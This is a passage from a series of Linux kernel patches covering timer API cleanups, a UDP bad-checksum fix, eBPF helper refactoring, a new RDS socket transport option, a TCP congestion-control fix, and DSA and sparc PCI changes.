@@ -init_timer(&e1); +setup_timer(&e1, a, b); ... when != a = e2 when != b = e3 -e1.data = b; ... when != a = e4 -e1.function = a; Signed-off-by: Vaishali Thakkar Signed-off-by: David S. Miller --- drivers/isdn/capi/capidrv.c | 4 +--- 1 file changed, 1 insertion(+), 3 deletions(-) diff --git a/drivers/isdn/capi/capidrv.c b/drivers/isdn/capi/capidrv.c index 1cc6ca8bfbda..85cfa4f8691f 100644 --- a/drivers/isdn/capi/capidrv.c +++ b/drivers/isdn/capi/capidrv.c @@ -2264,7 +2264,7 @@ static int capidrv_addcontr(u16 contr, struct capi_profile *profp) return -1; } card->owner = THIS_MODULE; - init_timer(&card->listentimer); + setup_timer(&card->listentimer, listentimerfunc, (unsigned long)card); strcpy(card->name, id); card->contrnr = contr; card->nbchan = profp->nbchannel; @@ -2331,8 +2331,6 @@ static int capidrv_addcontr(u16 contr, struct capi_profile *profp) card->cipmask = 0x1FFF03FF; /* any */ card->cipmask2 = 0; - card->listentimer.data = (unsigned long)card; - card->listentimer.function = listentimerfunc; send_listen(card); mod_timer(&card->listentimer, jiffies + 60 * HZ); From beb39db59d14990e401e235faf66a6b9b31240b0 Mon Sep 17 00:00:00 2001 From: Eric Dumazet Date: Sat, 30 May 2015 09:16:53 -0700 Subject: [PATCH 537/872] udp: fix behavior of wrong checksums We have two problems in UDP stack related to bogus checksums : 1) We return -EAGAIN to application even if receive queue is not empty. This breaks applications using edge trigger epoll() 2) Under UDP flood, we can loop forever without yielding to other processes, potentially hanging the host, especially on non SMP. This patch is an attempt to make things better. We might in the future add extra support for rt applications wanting to better control time spent doing a recv() in a hostile environment. For example we could validate checksums before queuing packets in socket receive queue. Signed-off-by: Eric Dumazet Cc: Willem de Bruijn Signed-off-by: David S. Miller --- net/ipv4/udp.c | 6 ++---- net/ipv6/udp.c | 6 ++---- 2 files changed, 4 insertions(+), 8 deletions(-) diff --git a/net/ipv4/udp.c b/net/ipv4/udp.c index d10b7e0112eb..1c92ea67baef 100644 --- a/net/ipv4/udp.c +++ b/net/ipv4/udp.c @@ -1345,10 +1345,8 @@ int udp_recvmsg(struct sock *sk, struct msghdr *msg, size_t len, int noblock, } unlock_sock_fast(sk, slow); - if (noblock) - return -EAGAIN; - - /* starting over for a new packet */ + /* starting over for a new packet, but check if we need to yield */ + cond_resched(); msg->msg_flags &= ~MSG_TRUNC; goto try_again; } diff --git a/net/ipv6/udp.c b/net/ipv6/udp.c index c2ec41617a35..e51fc3eee6db 100644 --- a/net/ipv6/udp.c +++ b/net/ipv6/udp.c @@ -525,10 +525,8 @@ int udpv6_recvmsg(struct sock *sk, struct msghdr *msg, size_t len, } unlock_sock_fast(sk, slow); - if (noblock) - return -EAGAIN; - - /* starting over for a new packet */ + /* starting over for a new packet, but check if we need to yield */ + cond_resched(); msg->msg_flags &= ~MSG_TRUNC; goto try_again; } From 17ca8cbf49be3aa94bb1c2b7ee6545fd70094eb4 Mon Sep 17 00:00:00 2001 From: Daniel Borkmann Date: Fri, 29 May 2015 23:23:06 +0200 Subject: [PATCH 538/872] ebpf: allow bpf_ktime_get_ns_proto also for networking As this is already exported from tracing side via commit d9847d310ab4 ("tracing: Allow BPF programs to call bpf_ktime_get_ns()"), we might as well want to move it to the core, so also networking users can make use of it, e.g. to measure diffs for certain flows from ingress/egress. Signed-off-by: Daniel Borkmann Cc: Alexei Starovoitov Cc: Ingo Molnar Signed-off-by: David S. Miller --- include/linux/bpf.h | 1 + kernel/bpf/core.c | 1 + kernel/bpf/helpers.c | 13 +++++++++++++ kernel/trace/bpf_trace.c | 12 ------------ net/core/filter.c | 2 ++ 5 files changed, 17 insertions(+), 12 deletions(-) diff --git a/include/linux/bpf.h b/include/linux/bpf.h index 5f520f5f087e..ca854e5bb2f7 100644 --- a/include/linux/bpf.h +++ b/include/linux/bpf.h @@ -186,5 +186,6 @@ extern const struct bpf_func_proto bpf_map_delete_elem_proto; extern const struct bpf_func_proto bpf_get_prandom_u32_proto; extern const struct bpf_func_proto bpf_get_smp_processor_id_proto; extern const struct bpf_func_proto bpf_tail_call_proto; +extern const struct bpf_func_proto bpf_ktime_get_ns_proto; #endif /* _LINUX_BPF_H */ diff --git a/kernel/bpf/core.c b/kernel/bpf/core.c index d44b25cbe460..4548422d5f6c 100644 --- a/kernel/bpf/core.c +++ b/kernel/bpf/core.c @@ -734,6 +734,7 @@ const struct bpf_func_proto bpf_map_delete_elem_proto __weak; const struct bpf_func_proto bpf_get_prandom_u32_proto __weak; const struct bpf_func_proto bpf_get_smp_processor_id_proto __weak; +const struct bpf_func_proto bpf_ktime_get_ns_proto __weak; /* To execute LD_ABS/LD_IND instructions __bpf_prog_run() may call * skb_copy_bits(), so provide a weak definition of it for NET-less config. diff --git a/kernel/bpf/helpers.c b/kernel/bpf/helpers.c index bd7f5988ed9c..b3aaabdf9a50 100644 --- a/kernel/bpf/helpers.c +++ b/kernel/bpf/helpers.c @@ -13,6 +13,7 @@ #include #include #include +#include /* If kernel subsystem is allowing eBPF programs to call this function, * inside its own verifier_ops->get_func_proto() callback it should return @@ -111,3 +112,15 @@ const struct bpf_func_proto bpf_get_smp_processor_id_proto = { .gpl_only = false, .ret_type = RET_INTEGER, }; + +static u64 bpf_ktime_get_ns(u64 r1, u64 r2, u64 r3, u64 r4, u64 r5) +{ + /* NMI safe access to clock monotonic */ + return ktime_get_mono_fast_ns(); +} + +const struct bpf_func_proto bpf_ktime_get_ns_proto = { + .func = bpf_ktime_get_ns, + .gpl_only = true, + .ret_type = RET_INTEGER, +}; diff --git a/kernel/trace/bpf_trace.c b/kernel/trace/bpf_trace.c index 646445e41bd4..50c4015a8ad3 100644 --- a/kernel/trace/bpf_trace.c +++ b/kernel/trace/bpf_trace.c @@ -79,18 +79,6 @@ static const struct bpf_func_proto bpf_probe_read_proto = { .arg3_type = ARG_ANYTHING, }; -static u64 bpf_ktime_get_ns(u64 r1, u64 r2, u64 r3, u64 r4, u64 r5) -{ - /* NMI safe access to clock monotonic */ - return ktime_get_mono_fast_ns(); -} - -static const struct bpf_func_proto bpf_ktime_get_ns_proto = { - .func = bpf_ktime_get_ns, - .gpl_only = true, - .ret_type = RET_INTEGER, -}; - /* * limited trace_printk() * only %d %u %x %ld %lu %lx %lld %llu %llx %p conversion specifiers allowed diff --git a/net/core/filter.c b/net/core/filter.c index 2c30d6632d66..b78a010a957f 100644 --- a/net/core/filter.c +++ b/net/core/filter.c @@ -1423,6 +1423,8 @@ sk_filter_func_proto(enum bpf_func_id func_id) return &bpf_get_smp_processor_id_proto; case BPF_FUNC_tail_call: return &bpf_tail_call_proto; + case BPF_FUNC_ktime_get_ns: + return &bpf_ktime_get_ns_proto; default: return NULL; } From 3324b584b6f633a24550691c194600bcab7fc899 Mon Sep 17 00:00:00 2001 From: Daniel Borkmann Date: Fri, 29 May 2015 23:23:07 +0200 Subject: [PATCH 539/872] ebpf: misc core cleanup Besides others, move bpf_tail_call_proto to the remaining definitions of other protos, improve comments a bit (i.e. remove some obvious ones, where the code is already self-documenting, add objectives for others), simplify bpf_prog_array_compatible() a bit. Signed-off-by: Daniel Borkmann Acked-by: Alexei Starovoitov Signed-off-by: David S. Miller --- kernel/bpf/core.c | 72 +++++++++++++++++++++++++------------------- kernel/bpf/helpers.c | 34 ++++++++++----------- 2 files changed, 58 insertions(+), 48 deletions(-) diff --git a/kernel/bpf/core.c b/kernel/bpf/core.c index 4548422d5f6c..1e00aa3316dc 100644 --- a/kernel/bpf/core.c +++ b/kernel/bpf/core.c @@ -26,9 +26,10 @@ #include #include #include -#include #include +#include + /* Registers */ #define BPF_R0 regs[BPF_REG_0] #define BPF_R1 regs[BPF_REG_1] @@ -62,6 +63,7 @@ void *bpf_internal_load_pointer_neg_helper(const struct sk_buff *skb, int k, uns ptr = skb_network_header(skb) + k - SKF_NET_OFF; else if (k >= SKF_LL_OFF) ptr = skb_mac_header(skb) + k - SKF_LL_OFF; + if (ptr >= skb->head && ptr + size <= skb_tail_pointer(skb)) return ptr; @@ -176,15 +178,6 @@ noinline u64 __bpf_call_base(u64 r1, u64 r2, u64 r3, u64 r4, u64 r5) return 0; } -const struct bpf_func_proto bpf_tail_call_proto = { - .func = NULL, - .gpl_only = false, - .ret_type = RET_VOID, - .arg1_type = ARG_PTR_TO_CTX, - .arg2_type = ARG_CONST_MAP_PTR, - .arg3_type = ARG_ANYTHING, -}; - /** * __bpf_prog_run - run eBPF program on a given context * @ctx: is the data we are operating on @@ -650,36 +643,35 @@ static unsigned int __bpf_prog_run(void *ctx, const struct bpf_insn *insn) return 0; } -void __weak bpf_int_jit_compile(struct bpf_prog *prog) -{ -} - -bool bpf_prog_array_compatible(struct bpf_array *array, const struct bpf_prog *fp) +bool bpf_prog_array_compatible(struct bpf_array *array, + const struct bpf_prog *fp) { - if (array->owner_prog_type) { - if (array->owner_prog_type != fp->type) - return false; - if (array->owner_jited != fp->jited) - return false; - } else { + if (!array->owner_prog_type) { + /* There's no owner yet where we could check for + * compatibility. + */ array->owner_prog_type = fp->type; array->owner_jited = fp->jited; + + return true; } - return true; + + return array->owner_prog_type == fp->type && + array->owner_jited == fp->jited; } -static int check_tail_call(const struct bpf_prog *fp) +static int bpf_check_tail_call(const struct bpf_prog *fp) { struct bpf_prog_aux *aux = fp->aux; int i; for (i = 0; i < aux->used_map_cnt; i++) { + struct bpf_map *map = aux->used_maps[i]; struct bpf_array *array; - struct bpf_map *map; - map = aux->used_maps[i]; if (map->map_type != BPF_MAP_TYPE_PROG_ARRAY) continue; + array = container_of(map, struct bpf_array, map); if (!bpf_prog_array_compatible(array, fp)) return -EINVAL; @@ -689,22 +681,25 @@ static int check_tail_call(const struct bpf_prog *fp) } /** - * bpf_prog_select_runtime - select execution runtime for BPF program + * bpf_prog_select_runtime - select exec runtime for BPF program * @fp: bpf_prog populated with internal BPF program * - * try to JIT internal BPF program, if JIT is not available select interpreter - * BPF program will be executed via BPF_PROG_RUN() macro + * Try to JIT eBPF program, if JIT is not available, use interpreter. + * The BPF program will be executed via BPF_PROG_RUN() macro. */ int bpf_prog_select_runtime(struct bpf_prog *fp) { fp->bpf_func = (void *) __bpf_prog_run; - /* Probe if internal BPF can be JITed */ bpf_int_jit_compile(fp); - /* Lock whole bpf_prog as read-only */ bpf_prog_lock_ro(fp); - return check_tail_call(fp); + /* The tail call compatibility check can only be done at + * this late stage as we need to determine, if we deal + * with JITed or non JITed program concatenations and not + * all eBPF JITs might immediately support all features. + */ + return bpf_check_tail_call(fp); } EXPORT_SYMBOL_GPL(bpf_prog_select_runtime); @@ -736,6 +731,21 @@ const struct bpf_func_proto bpf_get_prandom_u32_proto __weak; const struct bpf_func_proto bpf_get_smp_processor_id_proto __weak; const struct bpf_func_proto bpf_ktime_get_ns_proto __weak; +/* Always built-in helper functions. */ +const struct bpf_func_proto bpf_tail_call_proto = { + .func = NULL, + .gpl_only = false, + .ret_type = RET_VOID, + .arg1_type = ARG_PTR_TO_CTX, + .arg2_type = ARG_CONST_MAP_PTR, + .arg3_type = ARG_ANYTHING, +}; + +/* For classic BPF JITs that don't implement bpf_int_jit_compile(). */ +void __weak bpf_int_jit_compile(struct bpf_prog *prog) +{ +} + /* To execute LD_ABS/LD_IND instructions __bpf_prog_run() may call * skb_copy_bits(), so provide a weak definition of it for NET-less config. */ diff --git a/kernel/bpf/helpers.c b/kernel/bpf/helpers.c index b3aaabdf9a50..7ad5d8842d5b 100644 --- a/kernel/bpf/helpers.c +++ b/kernel/bpf/helpers.c @@ -45,11 +45,11 @@ static u64 bpf_map_lookup_elem(u64 r1, u64 r2, u64 r3, u64 r4, u64 r5) } const struct bpf_func_proto bpf_map_lookup_elem_proto = { - .func = bpf_map_lookup_elem, - .gpl_only = false, - .ret_type = RET_PTR_TO_MAP_VALUE_OR_NULL, - .arg1_type = ARG_CONST_MAP_PTR, - .arg2_type = ARG_PTR_TO_MAP_KEY, + .func = bpf_map_lookup_elem, + .gpl_only = false, + .ret_type = RET_PTR_TO_MAP_VALUE_OR_NULL, + .arg1_type = ARG_CONST_MAP_PTR, + .arg2_type = ARG_PTR_TO_MAP_KEY, }; static u64 bpf_map_update_elem(u64 r1, u64 r2, u64 r3, u64 r4, u64 r5) @@ -64,13 +64,13 @@ static u64 bpf_map_update_elem(u64 r1, u64 r2, u64 r3, u64 r4, u64 r5) } const struct bpf_func_proto bpf_map_update_elem_proto = { - .func = bpf_map_update_elem, - .gpl_only = false, - .ret_type = RET_INTEGER, - .arg1_type = ARG_CONST_MAP_PTR, - .arg2_type = ARG_PTR_TO_MAP_KEY, - .arg3_type = ARG_PTR_TO_MAP_VALUE, - .arg4_type = ARG_ANYTHING, + .func = bpf_map_update_elem, + .gpl_only = false, + .ret_type = RET_INTEGER, + .arg1_type = ARG_CONST_MAP_PTR, + .arg2_type = ARG_PTR_TO_MAP_KEY, + .arg3_type = ARG_PTR_TO_MAP_VALUE, + .arg4_type = ARG_ANYTHING, }; static u64 bpf_map_delete_elem(u64 r1, u64 r2, u64 r3, u64 r4, u64 r5) @@ -84,11 +84,11 @@ static u64 bpf_map_delete_elem(u64 r1, u64 r2, u64 r3, u64 r4, u64 r5) } const struct bpf_func_proto bpf_map_delete_elem_proto = { - .func = bpf_map_delete_elem, - .gpl_only = false, - .ret_type = RET_INTEGER, - .arg1_type = ARG_CONST_MAP_PTR, - .arg2_type = ARG_PTR_TO_MAP_KEY, + .func = bpf_map_delete_elem, + .gpl_only = false, + .ret_type = RET_INTEGER, + .arg1_type = ARG_CONST_MAP_PTR, + .arg2_type = ARG_PTR_TO_MAP_KEY, }; static u64 bpf_get_prandom_u32(u64 r1, u64 r2, u64 r3, u64 r4, u64 r5) From f16e9d86ae435d7ee6e9eaceb8ba1cf3b1895b72 Mon Sep 17 00:00:00 2001 From: Vaishali Thakkar Date: Mon, 1 Jun 2015 10:13:49 +0530 Subject: [PATCH 540/872] ethernet/intel: Use setup_timer Use the timer API function setup_timer instead of structure field assignments to initialize a timer. A simplified version of the Coccinelle semantic patch that performs this transformation is as follows: @change@ expression e1, e2, e3, e4, a, b; @@ -init_timer(&e1); +setup_timer(&e1, a, b); ... when != a = e2 when != b = e3 -e1.function = a; ... when != b = e4 -e1.data = b; Signed-off-by: Vaishali Thakkar Signed-off-by: David S. Miller --- drivers/net/ethernet/intel/e100.c | 4 +--- 1 file changed, 1 insertion(+), 3 deletions(-) diff --git a/drivers/net/ethernet/intel/e100.c b/drivers/net/ethernet/intel/e100.c index 35357ae2fe75..d2657a412768 100644 --- a/drivers/net/ethernet/intel/e100.c +++ b/drivers/net/ethernet/intel/e100.c @@ -2922,9 +2922,7 @@ static int e100_probe(struct pci_dev *pdev, const struct pci_device_id *ent) pci_set_master(pdev); - init_timer(&nic->watchdog); - nic->watchdog.function = e100_watchdog; - nic->watchdog.data = (unsigned long)nic; + setup_timer(&nic->watchdog, e100_watchdog, (unsigned long)nic); INIT_WORK(&nic->tx_timeout_task, e100_tx_timeout_task); From a28c257c9eb0bd76a4adcac97c07e34044ec71fb Mon Sep 17 00:00:00 2001 From: Sowmini Varadhan Date: Fri, 29 May 2015 17:28:07 -0400 Subject: [PATCH 541/872] net/rds: Declare SO_RDS_TRANSPORT and RDS_TRANS_* constants in uapi/linux/rds.h User space applications that desire to explicitly select the underlying transport for a PF_RDS socket may do so by using the SO_RDS_TRANSPORT socket option at the SOL_RDS level before bind(). The integer argument provided to the socket option would be one of the RDS_TRANS_* values, e.g., RDS_TRANS_TCP. This commit exports the constant values need by such applications via Signed-off-by: Sowmini Varadhan Signed-off-by: David S. Miller --- include/uapi/linux/rds.h | 10 ++++++++++ net/rds/rds.h | 5 ----- 2 files changed, 10 insertions(+), 5 deletions(-) diff --git a/include/uapi/linux/rds.h b/include/uapi/linux/rds.h index 91950950aa59..0f9265cb2a96 100644 --- a/include/uapi/linux/rds.h +++ b/include/uapi/linux/rds.h @@ -38,6 +38,8 @@ #define RDS_IB_ABI_VERSION 0x301 +#define SOL_RDS 276 + /* * setsockopt/getsockopt for SOL_RDS */ @@ -48,6 +50,14 @@ #define RDS_RECVERR 5 #define RDS_CONG_MONITOR 6 #define RDS_GET_MR_FOR_DEST 7 +#define SO_RDS_TRANSPORT 8 + +/* supported values for SO_RDS_TRANSPORT */ +#define RDS_TRANS_IB 0 +#define RDS_TRANS_IWARP 1 +#define RDS_TRANS_TCP 2 +#define RDS_TRANS_COUNT 3 +#define RDS_TRANS_NONE (~0) /* * Control message types for SOL_RDS. diff --git a/net/rds/rds.h b/net/rds/rds.h index 0d41155a2258..76db508f73a1 100644 --- a/net/rds/rds.h +++ b/net/rds/rds.h @@ -408,11 +408,6 @@ struct rds_notifier { * should try hard not to block. */ -#define RDS_TRANS_IB 0 -#define RDS_TRANS_IWARP 1 -#define RDS_TRANS_TCP 2 -#define RDS_TRANS_COUNT 3 - struct rds_transport { char t_name[TRANSNAMSIZ]; struct list_head t_item; From d97dac54bf83b2a3df85fba37595e355627e0f2b Mon Sep 17 00:00:00 2001 From: Sowmini Varadhan Date: Fri, 29 May 2015 17:28:08 -0400 Subject: [PATCH 542/872] net/rds: Add setsockopt support for SO_RDS_TRANSPORT An application may deterministically attach the underlying transport for a PF_RDS socket by invoking setsockopt(2) with the SO_RDS_TRANSPORT option at the SOL_RDS level. The integer argument to setsockopt must be one of the RDS_TRANS_* transport types, e.g., RDS_TRANS_TCP. The option must be specified before invoking bind(2) on the socket, and may only be used once on the socket. An attempt to set the option on a bound socket, or to invoke the option after a successful SO_RDS_TRANSPORT attachment, will return EOPNOTSUPP. Signed-off-by: Sowmini Varadhan Signed-off-by: David S. Miller --- net/rds/af_rds.c | 27 +++++++++++++++++++++++++++ net/rds/bind.c | 4 ++++ net/rds/rds.h | 1 + net/rds/transport.c | 21 +++++++++++++++++++++ 4 files changed, 53 insertions(+) diff --git a/net/rds/af_rds.c b/net/rds/af_rds.c index 3d83641f2861..04877441fb01 100644 --- a/net/rds/af_rds.c +++ b/net/rds/af_rds.c @@ -270,6 +270,28 @@ static int rds_cong_monitor(struct rds_sock *rs, char __user *optval, return ret; } +static int rds_set_transport(struct rds_sock *rs, char __user *optval, + int optlen) +{ + int t_type; + + if (rs->rs_transport) + return -EOPNOTSUPP; /* previously attached to transport */ + + if (optlen != sizeof(int)) + return -EINVAL; + + if (copy_from_user(&t_type, (int __user *)optval, sizeof(t_type))) + return -EFAULT; + + if (t_type < 0 || t_type >= RDS_TRANS_COUNT) + return -EINVAL; + + rs->rs_transport = rds_trans_get(t_type); + + return rs->rs_transport ? 0 : -ENOPROTOOPT; +} + static int rds_setsockopt(struct socket *sock, int level, int optname, char __user *optval, unsigned int optlen) { @@ -300,6 +322,11 @@ static int rds_setsockopt(struct socket *sock, int level, int optname, case RDS_CONG_MONITOR: ret = rds_cong_monitor(rs, optval, optlen); break; + case SO_RDS_TRANSPORT: + lock_sock(sock->sk); + ret = rds_set_transport(rs, optval, optlen); + release_sock(sock->sk); + break; default: ret = -ENOPROTOOPT; } diff --git a/net/rds/bind.c b/net/rds/bind.c index a2e6562da751..4ebd29c128b6 100644 --- a/net/rds/bind.c +++ b/net/rds/bind.c @@ -181,6 +181,10 @@ int rds_bind(struct socket *sock, struct sockaddr *uaddr, int addr_len) if (ret) goto out; + if (rs->rs_transport) { /* previously bound */ + ret = 0; + goto out; + } trans = rds_trans_get_preferred(sin->sin_addr.s_addr); if (!trans) { ret = -EADDRNOTAVAIL; diff --git a/net/rds/rds.h b/net/rds/rds.h index 76db508f73a1..a33fb4ad3535 100644 --- a/net/rds/rds.h +++ b/net/rds/rds.h @@ -798,6 +798,7 @@ struct rds_transport *rds_trans_get_preferred(__be32 addr); void rds_trans_put(struct rds_transport *trans); unsigned int rds_trans_stats_info_copy(struct rds_info_iterator *iter, unsigned int avail); +struct rds_transport *rds_trans_get(int t_type); int rds_trans_init(void); void rds_trans_exit(void); diff --git a/net/rds/transport.c b/net/rds/transport.c index 7f2ac4fec367..8b4a6cd2c3a7 100644 --- a/net/rds/transport.c +++ b/net/rds/transport.c @@ -101,6 +101,27 @@ struct rds_transport *rds_trans_get_preferred(__be32 addr) return ret; } +struct rds_transport *rds_trans_get(int t_type) +{ + struct rds_transport *ret = NULL; + struct rds_transport *trans; + unsigned int i; + + down_read(&rds_trans_sem); + for (i = 0; i < RDS_TRANS_COUNT; i++) { + trans = transports[i]; + + if (trans && trans->t_type == t_type && + (!trans->t_owner || try_module_get(trans->t_owner))) { + ret = trans; + break; + } + } + up_read(&rds_trans_sem); + + return ret; +} + /* * This returns the number of stats entries in the snapshot and only * copies them using the iter if there is enough space for them. The From 8ba38460f363e4d26d666aae9bc7fd3afa5f8e43 Mon Sep 17 00:00:00 2001 From: Sowmini Varadhan Date: Fri, 29 May 2015 17:28:09 -0400 Subject: [PATCH 543/872] net/rds Add getsockopt support for SO_RDS_TRANSPORT The currently attached transport for a PF_RDS socket may be obtained from user space by invoking getsockopt(2) using the SO_RDS_TRANSPORT option at the SOL_RDS level. The integer optval returned will be one of the RDS_TRANS_* constants defined in linux/rds.h. Signed-off-by: Sowmini Varadhan Signed-off-by: David S. Miller --- net/rds/af_rds.c | 14 ++++++++++++++ 1 file changed, 14 insertions(+) diff --git a/net/rds/af_rds.c b/net/rds/af_rds.c index 04877441fb01..2ad9032372b2 100644 --- a/net/rds/af_rds.c +++ b/net/rds/af_rds.c @@ -339,6 +339,7 @@ static int rds_getsockopt(struct socket *sock, int level, int optname, { struct rds_sock *rs = rds_sk_to_rs(sock->sk); int ret = -ENOPROTOOPT, len; + int trans; if (level != SOL_RDS) goto out; @@ -364,6 +365,19 @@ static int rds_getsockopt(struct socket *sock, int level, int optname, else ret = 0; break; + case SO_RDS_TRANSPORT: + if (len < sizeof(int)) { + ret = -EINVAL; + break; + } + trans = (rs->rs_transport ? rs->rs_transport->t_type : + RDS_TRANS_NONE); /* unbound */ + if (put_user(trans, (int __user *)optval) || + put_user(sizeof(int), optlen)) + ret = -EFAULT; + else + ret = 0; + break; default: break; } From 9f950415e4e28e7cfae2e416b43e862e8101d996 Mon Sep 17 00:00:00 2001 From: Neal Cardwell Date: Fri, 29 May 2015 13:47:07 -0400 Subject: [PATCH 544/872] tcp: fix child sockets to use system default congestion control if not set Linux 3.17 and earlier are explicitly engineered so that if the app doesn't specifically request a CC module on a listener before the SYN arrives, then the child gets the system default CC when the connection is established. See tcp_init_congestion_control() in 3.17 or earlier, which says "if no choice made yet assign the current value set as default". The change ("net: tcp: assign tcp cong_ops when tcp sk is created") altered these semantics, so that children got their parent listener's congestion control even if the system default had changed after the listener was created. This commit returns to those original semantics from 3.17 and earlier, since they are the original semantics from 2007 in 4d4d3d1e8 ("[TCP]: Congestion control initialization."), and some Linux congestion control workflows depend on that. In summary, if a listener socket specifically sets TCP_CONGESTION to "x", or the route locks the CC module to "x", then the child gets "x". Otherwise the child gets current system default from net.ipv4.tcp_congestion_control. That's the behavior in 3.17 and earlier, and this commit restores that. Fixes: 55d8694fa82c ("net: tcp: assign tcp cong_ops when tcp sk is created") Cc: Florian Westphal Cc: Daniel Borkmann Cc: Glenn Judd Cc: Stephen Hemminger Signed-off-by: Neal Cardwell Signed-off-by: Eric Dumazet Signed-off-by: Yuchung Cheng Acked-by: Daniel Borkmann Signed-off-by: David S. Miller --- include/net/inet_connection_sock.h | 3 ++- net/ipv4/tcp_cong.c | 5 ++++- net/ipv4/tcp_minisocks.c | 5 ++++- 3 files changed, 10 insertions(+), 3 deletions(-) diff --git a/include/net/inet_connection_sock.h b/include/net/inet_connection_sock.h index 497bc14cdb85..0320bbb7d7b5 100644 --- a/include/net/inet_connection_sock.h +++ b/include/net/inet_connection_sock.h @@ -98,7 +98,8 @@ struct inet_connection_sock { const struct tcp_congestion_ops *icsk_ca_ops; const struct inet_connection_sock_af_ops *icsk_af_ops; unsigned int (*icsk_sync_mss)(struct sock *sk, u32 pmtu); - __u8 icsk_ca_state:7, + __u8 icsk_ca_state:6, + icsk_ca_setsockopt:1, icsk_ca_dst_locked:1; __u8 icsk_retransmits; __u8 icsk_pending; diff --git a/net/ipv4/tcp_cong.c b/net/ipv4/tcp_cong.c index 7a5ae50c80c8..84be008c945c 100644 --- a/net/ipv4/tcp_cong.c +++ b/net/ipv4/tcp_cong.c @@ -187,6 +187,7 @@ static void tcp_reinit_congestion_control(struct sock *sk, tcp_cleanup_congestion_control(sk); icsk->icsk_ca_ops = ca; + icsk->icsk_ca_setsockopt = 1; if (sk->sk_state != TCP_CLOSE && icsk->icsk_ca_ops->init) icsk->icsk_ca_ops->init(sk); @@ -335,8 +336,10 @@ int tcp_set_congestion_control(struct sock *sk, const char *name) rcu_read_lock(); ca = __tcp_ca_find_autoload(name); /* No change asking for existing value */ - if (ca == icsk->icsk_ca_ops) + if (ca == icsk->icsk_ca_ops) { + icsk->icsk_ca_setsockopt = 1; goto out; + } if (!ca) err = -ENOENT; else if (!((ca->flags & TCP_CONG_NON_RESTRICTED) || diff --git a/net/ipv4/tcp_minisocks.c b/net/ipv4/tcp_minisocks.c index b5732a54f2ad..17e7339ee5ca 100644 --- a/net/ipv4/tcp_minisocks.c +++ b/net/ipv4/tcp_minisocks.c @@ -420,7 +420,10 @@ void tcp_ca_openreq_child(struct sock *sk, const struct dst_entry *dst) rcu_read_unlock(); } - if (!ca_got_dst && !try_module_get(icsk->icsk_ca_ops->owner)) + /* If no valid choice made yet, assign current system default ca. */ + if (!ca_got_dst && + (!icsk->icsk_ca_setsockopt || + !try_module_get(icsk->icsk_ca_ops->owner))) tcp_assign_congestion_control(sk); tcp_set_ca_state(sk, TCP_CA_Open); From 24595346d79b6bd98a77d24c493e8490639788fc Mon Sep 17 00:00:00 2001 From: Florian Fainelli Date: Fri, 29 May 2015 10:29:46 -0700 Subject: [PATCH 545/872] net: dsa: Properly propagate errors from dsa_switch_setup_one While shuffling some code around, dsa_switch_setup_one() was introduced, and it was modified to return either an error code using ERR_PTR() or a NULL pointer when running out of memory or failing to setup a switch. This is a problem for its caler: dsa_switch_setup() which uses IS_ERR() and expects to find an error code, not a NULL pointer, so we still try to proceed with dsa_switch_setup() and operate on invalid memory addresses. This can be easily reproduced by having e.g: the bcm_sf2 driver built-in, but having no such switch, such that drv->setup will fail. Fix this by using PTR_ERR() consistently which is both more informative and avoids for the caller to use IS_ERR_OR_NULL(). Fixes: df197195a5248 ("net: dsa: split dsa_switch_setup into two functions") Reported-by: Andrew Lunn Signed-off-by: Florian Fainelli Tested-by: Andrew Lunn Signed-off-by: David S. Miller --- net/dsa/dsa.c | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/net/dsa/dsa.c b/net/dsa/dsa.c index e6f6cc3a1bcf..392e29a0227d 100644 --- a/net/dsa/dsa.c +++ b/net/dsa/dsa.c @@ -359,7 +359,7 @@ dsa_switch_setup(struct dsa_switch_tree *dst, int index, */ ds = kzalloc(sizeof(*ds) + drv->priv_size, GFP_KERNEL); if (ds == NULL) - return NULL; + return ERR_PTR(-ENOMEM); ds->dst = dst; ds->index = index; @@ -370,7 +370,7 @@ dsa_switch_setup(struct dsa_switch_tree *dst, int index, ret = dsa_switch_setup_one(ds, parent); if (ret) - return NULL; + return ERR_PTR(ret); return ds; } From 8642ad1c7ba43b1c48eb39a863e975f3f8f96168 Mon Sep 17 00:00:00 2001 From: Christophe Jaillet Date: Fri, 1 May 2015 14:05:39 +0200 Subject: [PATCH 546/872] sparc: kernel: GRPCI2: Remove a useless memset grpci2priv is allocated using kzalloc, so there is no need to memset it. Signed-off-by: Christophe Jaillet Signed-off-by: David S. Miller --- arch/sparc/kernel/leon_pci_grpci2.c | 1 - 1 file changed, 1 deletion(-) diff --git a/arch/sparc/kernel/leon_pci_grpci2.c b/arch/sparc/kernel/leon_pci_grpci2.c index 94e392bdee7d..814fb1729b12 100644 --- a/arch/sparc/kernel/leon_pci_grpci2.c +++ b/arch/sparc/kernel/leon_pci_grpci2.c @@ -723,7 +723,6 @@ static int grpci2_of_probe(struct platform_device *ofdev) err = -ENOMEM; goto err1; } - memset(grpci2priv, 0, sizeof(*grpci2priv)); priv->regs = regs; priv->irq = ofdev->archdata.irqs[0]; /* BASE IRQ */ priv->irq_mode = (capability & STS_IRQMODE) >> STS_IRQMODE_BIT; From f0c1a1173773a56d500f1814893e63f97580f76a Mon Sep 17 00:00:00 2001 From: Eric Snowberg Date: Wed, 27 May 2015 11:59:19 -0400 Subject: [PATCH 547/872] sparc64: pci slots information is not populated in sysfs Add PCI slot numbers within sysfs for PCIe hardware. Larger PCIe systems with nested PCI bridges and slots further down on these bridges were not being populated within sysfs. This will add ACPI style PCI slot numbers for these systems since the OF 'slot-names' information is not available on all PCIe platforms. Signed-off-by: Eric Snowberg Reviewed-by: Bob Picco Signed-off-by: David S. Miller --- arch/sparc/kernel/pci.c | 59 +++++++++++++++++++++++++++++++++++------ 1 file changed, 51 insertions(+), 8 deletions(-) diff --git a/arch/sparc/kernel/pci.c b/arch/sparc/kernel/pci.c index 6f7251fd2eab..c928bc64b4ba 100644 --- a/arch/sparc/kernel/pci.c +++ b/arch/sparc/kernel/pci.c @@ -1002,6 +1002,38 @@ static int __init pcibios_init(void) subsys_initcall(pcibios_init); #ifdef CONFIG_SYSFS + +#define SLOT_NAME_SIZE 11 /* Max decimal digits + null in u32 */ + +static void pcie_bus_slot_names(struct pci_bus *pbus) +{ + struct pci_dev *pdev; + struct pci_bus *bus; + + list_for_each_entry(pdev, &pbus->devices, bus_list) { + char name[SLOT_NAME_SIZE]; + struct pci_slot *pci_slot; + const u32 *slot_num; + int len; + + slot_num = of_get_property(pdev->dev.of_node, + "physical-slot#", &len); + + if (slot_num == NULL || len != 4) + continue; + + snprintf(name, sizeof(name), "%u", slot_num[0]); + 